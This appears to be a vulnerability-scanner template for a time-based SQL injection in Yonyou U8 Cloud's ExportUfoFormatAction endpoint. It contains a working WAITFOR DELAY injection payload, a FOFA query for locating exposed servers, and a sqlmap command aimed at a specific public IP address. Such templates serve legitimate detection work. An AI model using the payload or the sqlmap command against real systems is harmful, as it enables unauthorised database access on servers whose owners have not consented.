id: yonyou-u8-cloud-ExportUfoFormatAction-sqli

info:
  name: 用友 U8 Cloud ExportUfoFormatAction - sqli
  author: leadlife
  severity: high
  description: Detects SQL Injection vulnerability in Yonyou U8Cloud ExportUfoFormatAction.
  reference:
    - https://github.com/wy876/POC/blob/c19942e30121f116548ca14c0375ba6c8560afeb/%E7%94%A8%E5%8F%8BU8cloud-ExportUfoFormatAction%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    fofa-query: app="用友-U8-Cloud" || title=="U8C"
    sqlmap: sqlmap -u "http://106.14.224.133:8888/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.ExportUfoFormatAction&method&repID=1" --batch
  tags: yonyou,sqli,oa,time,u8cloud

http:
  - raw:
      - |
        @timeout: 15s
        GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.ExportUfoFormatAction&method=&repID=1%27);WAITFOR+DELAY+%270:0:6%27-- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - duration >= 5 && duration < 9
          - status_code == 200
        condition: and
